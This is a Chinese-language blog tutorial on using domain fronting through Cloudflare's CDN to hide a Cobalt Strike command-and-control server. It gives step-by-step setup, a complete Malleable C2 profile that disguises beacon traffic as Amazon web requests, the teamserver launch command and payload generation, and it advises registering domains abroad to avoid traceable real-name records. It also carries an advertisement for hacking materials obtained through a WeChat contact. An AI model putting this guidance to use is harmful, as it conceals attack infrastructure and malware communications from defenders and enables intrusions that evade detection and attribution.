域前置技术和C2隐藏

域前置介绍

域前置又译为域名幌子，是一种隐藏连接真实端点来规避审查的技术。在应用层上运作时，域前置使用户能通过HTTPS连接到被屏蔽的服务，而表面上像在与另一个完全不同的站点通信。
域前置工作原理

域前置核心就是CDN，可以通过添加 A 记录或 AAAA 记录解析的方式将网站域名指向网站服务器公网 IP 地址，来实现用户可以通过域名直接访问已部署在服务器上的网站，而无需使用难记且无明显标识的 IP 地址访问。CDN能够对域名进行加速，当对某个域名进行访问时，并不会直接解析到IP，因此可以给攻击VPS申请一个CDN加速服务，从而达到隐藏IP的效果
CDN工作原理

CDN又叫内容分发网络（Content Delivery Network）
当用户访问域名时，先请求LDNS(即本地dns)，如果有缓存会返回给用户ip地址，如果LNDS无缓存即向授权DNS请求，授权DNS解析域名返回别名域名，域名解析请求发送至公有云DNS调度系统，则会分配最佳节点ip地址，LDNS会缓存该IP地址，用户根据该ip地址请求资源，节点ip隐藏了真实ip的地址。
搭建过程

这里选择腾讯云的域名
[img=720,194.34854315558]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403095.png[/img]
先实名后注册，注册时间可能比较久，在腾讯云服务器上，根据申请的域名添加解析记录。
[img=720,414.2950819672131]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403096.png[/img]
域名备案，实际上国内的备案了之后Redteam已无法使用了。
 
【----帮助网安学习，以下所有学习资料免费领！加vx：yj009991，备注 “博客园” 获取！】
　① 网安学习成长路径思维导图
　② 60+网安经典常用工具包
　③ 100+SRC漏洞分析报告
　④ 150+网安攻防实战技术电子书
　⑤ 最权威CISSP 认证考试指南+题库
　⑥ 超1800页CTF实战技巧手册
　⑦ 最新网安大厂面试题合集（含答案）
　⑧ APP客户端安全检测指南（安卓+IOS）
 
注册 cloudflare

https://www.cloudflare.com/zh-cn/

进入后添加站点
[img=720,279.045996592845]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403097.png[/img]
输入申请的域名别名，选择免费即可
[img=720,417.35963581183614]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403098.png[/img]
继续
[img=720,267.93542905692436]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403099.png[/img]
这里会对域名的A记录和CNAME自动进行检测
[img=720,407.7922077922078]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403100.png[/img]
这个时候邮箱会收到cloudflare的邮件。
修改dns记录，域名注册->我的域名->概览位置修改dns
[img=600,459.8473282442748]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403101.png[/img]
然后等待dns刷新即可，此时我们ping一下我们的域名发现，解析后的ip地址不是真实的ip地址。
[img=720,248.02056555269922]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403102.png[/img]
ip地址为cloudflare的ip
[img=550,188.67924528301887]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403103.png[/img]
[img=720,373.1707317073171]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403104.png[/img]
nslookup查询
[img=720,219.67621419676215]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403105.png[/img]
SSL/TLS

如果要实现https加密需要下载配置c2证书
[img=720,259.3006993006993]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403106.png[/img]
下载证书
[img=720,326.2876254180602]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403107.png[/img]
在VPS需重新生成cs的配置文件cobalstrike.store
C2配置隐藏

项目地址

https://github.com/rsmudge/Malleable-C2-Profiles

1. set sleeptime "5000";
2. set jitter    "0";
3. set maxdns    "255";
4. set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
5. ​
6. http-get {
7. ​
8.     set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
9.    
10.     client {
11.    
12.         header "Accept" "*/*";
13.         header "Host" "www.xxx.xxx";    #配置自己的根域名不是别名
14.    
15.         metadata {
16.             base64;
17.             prepend "session-token=";
18.             prepend "skin=noskin;";
19.             append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
20.             header "Cookie";
21.         }
22.     }
23.    
24.     server {
25.    
26.         header "Server" "Server";
27.         header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
28.         header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
29.         header "X-Frame-Options" "SAMEORIGIN";
30.         header "Content-Encoding" "gzip";
31.    
32.         output {
33.             print;
34.         }
35.     }
36. ​
37. }
38. ​
39. http-post {
40.    
41. ​
42.     set uri "/N4215/adj/amzn.us.sr.aps";
43.    
44.     client {
45.    
46.         header "Accept" "*/*";
47.         header "Content-Type" "text/xml";
48.         header "X-Requested-With" "XMLHttpRequest";
49.         header "Host" "www.xxx.xxx";   #配置自己的根域名不是别名
50.    
51.         parameter "sz" "160x600";
52.         parameter "oe" "oe=ISO-8859-1;";
53.    
54.         id {
55.             parameter "sn";
56.         }
57.    
58.         parameter "s" "3717";
59.         parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";
60.    
61.         output {
62.             base64;
63.             print;
64.         }
65.     }
66.    
67.     server {
68.    
69.         header "Server" "Server";
70.         header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
71.         header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
72.         header "X-Frame-Options" "SAMEORIGIN";
73.         header "x-ua-compatible" "IE=edge";
74.    
75.         output {
76.             print;
77.         }
78.     }
79. ​
80. }

复制代码

 
启动服务端，调用配置文件

./teamserver cs服务端ip password config.profile

生成监听

保存
[img=720,45.65287479849543]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403109.png[/img]
生成64位的应用程序
[img=720,88.32298136645963]https://m-1254331109.cos.ap-guangzhou.myqcloud.com/202211091403110.png[/img]
成功上线
TIPS

实名注册的腾讯云域名的话是有备案的，所以这里的话建议选择国外的服务器注册域名。
更多靶场实验练习、网安学习资料，请点击这里>>
 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！